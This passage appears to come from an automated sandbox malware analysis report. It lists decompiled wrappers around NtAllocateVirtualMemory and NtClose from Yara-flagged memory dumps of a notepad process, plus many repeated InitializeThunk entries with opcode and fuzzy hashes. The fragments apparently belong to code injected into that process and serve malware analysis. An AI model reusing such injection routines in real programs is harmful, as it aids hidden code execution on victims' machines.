                                                    				_t12 = _v0;
                                                    				_t5 = _t12 + 0xc84; // 0x3c84
                                                    				E0041B9B0( *((intOrPtr*)(_v0 + 0x14)), _t12, _t5,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x30);
                                                    				_t16 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
                                                    				return _t16;
                                                    			}






                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041BBED,?,0041BBED,?,00000000,?,00003000,00000040,00409C63,00000000), ref: 0041AF59
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: 5f9f3f2602ee0c3e710593ffe4983b521bbf291823e6337950a3e9ccbae6f77d
                                                    • Instruction ID: 38ff08d943a92b2f5ed9712c74b7e3c40056e9063af96344001ae54088884a6d
                                                    • Opcode Fuzzy Hash: 5f9f3f2602ee0c3e710593ffe4983b521bbf291823e6337950a3e9ccbae6f77d
                                                    • Instruction Fuzzy Hash: 6FF0F8B5200219ABDB18DF99DC81E9B77ADEF8C354F018259BA0997241C630E811CBB4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph (legend: Executed / Not Executed)
                                                    • Block 280: 41af20-41af36
                                                    • Block 281: 41af3c-41af5d NtAllocateVirtualMemory
                                                    • Block 282: 41af37 call 41b9b0
                                                    • Edges: 280->281, 280->282, 282->281
                                                    C-Code - Quality: 100%
                                                    			E0041AF20(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                    				long _t14;
                                                    
                                                    				_t3 = _a4 + 0xc84; // 0x3c84
                                                    				E0041B9B0( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                    				return _t14;
                                                    			}





                                                    APIs
                                                    • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041BBED,?,0041BBED,?,00000000,?,00003000,00000040,00409C63,00000000), ref: 0041AF59
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: AllocateMemoryVirtual
                                                    • String ID:
                                                    • API String ID: 2167126740-0
                                                    • Opcode ID: a33f675ee626bb7b9b22684e476a5830a3283a9077953d9b243d4b27987ee3c2
                                                    • Instruction ID: 6f5e986479cc3908d889538428cc217ae1d986c0f07698dd23623d9a68b12c7a
                                                    • Opcode Fuzzy Hash: a33f675ee626bb7b9b22684e476a5830a3283a9077953d9b243d4b27987ee3c2
                                                    • Instruction Fuzzy Hash: 32F0F2B2210208ABCB18DF89DC81EAB77ADAF88654F018109BA0897241CA30E8118BE4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0041AE6A(void* __eax, intOrPtr _a4, void* _a8) {
                                                    				long _t11;
                                                    
                                                    				_t8 = _a4;
                                                    				_t4 = _t8 + 0x14; // 0x56c29f0f
                                                    				_t5 = _t8 + 0xc74; // 0x40a8d7
                                                    				E0041B9B0( *_t4, _a4, _t5,  *_t4, 0, 0x2c);
                                                    				_t11 = NtClose(_a8); // executed
                                                    				return _t11;
                                                    			}





                                                    APIs
                                                    • NtClose.NTDLL(00415FBE,?,?,00415FBE,00409C63,FFFFFFFF), ref: 0041AE95
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 717748b76bd646d9a371b26f9814808e1180e98c2cbc0e64419c4f3987fdc23a
                                                    • Instruction ID: 1c828a904c385d8a0aff37bf428e4edd8597b2182cbb98ccf3f296e8e674625b
                                                    • Opcode Fuzzy Hash: 717748b76bd646d9a371b26f9814808e1180e98c2cbc0e64419c4f3987fdc23a
                                                    • Instruction Fuzzy Hash: 1BE0C2712002046FD610EFA5CC49FC73B68DF48750F004455BE0C9B742CA30EA008BE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E0041AE70(intOrPtr _a4, void* _a8) {
                                                    				long _t8;
                                                    
                                                    				_t5 = _a4;
                                                    				_t2 = _t5 + 0x14; // 0x56c29f0f
                                                    				_t3 = _t5 + 0xc74; // 0x40a8d7
                                                    				E0041B9B0( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
                                                    				_t8 = NtClose(_a8); // executed
                                                    				return _t8;
                                                    			}





                                                    APIs
                                                    • NtClose.NTDLL(00415FBE,?,?,00415FBE,00409C63,FFFFFFFF), ref: 0041AE95
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1039958071.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_400000_notepad.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Close
                                                    • String ID:
                                                    • API String ID: 3535843008-0
                                                    • Opcode ID: 2ef1dc4ab05b91dc299c7f1afad97524dcd564c6ceaa00152f65cec0fd43af9d
                                                    • Instruction ID: c38d3d50f8ec0f29125cfe1bdcc2e0d0407bf39179b1731fc0727421f36e34e1
                                                    • Opcode Fuzzy Hash: 2ef1dc4ab05b91dc299c7f1afad97524dcd564c6ceaa00152f65cec0fd43af9d
                                                    • Instruction Fuzzy Hash: ECD01772210218ABD614EBA9DC89ED77BACDF48660F014155BA4C5B242CA30FA008BE4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                                    • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                                    • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                    • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                    • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction ID: 41e4343c146f66e2bb318e135f4e172b2897deff735033a37a94e91f6413aa4b
                                                    • Opcode Fuzzy Hash: 2990f9787256fe8461cfe6d04bba8dff018c5c70436f30267b6dae5db6cec36e
                                                    • Instruction Fuzzy Hash: DBB012B2100540C7E3099714D946B4B7210FB90F00F40C93BA11B81861DB3C993CD46A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                    • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                    • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                    • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                    • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                    • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                    • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                    • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                    • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
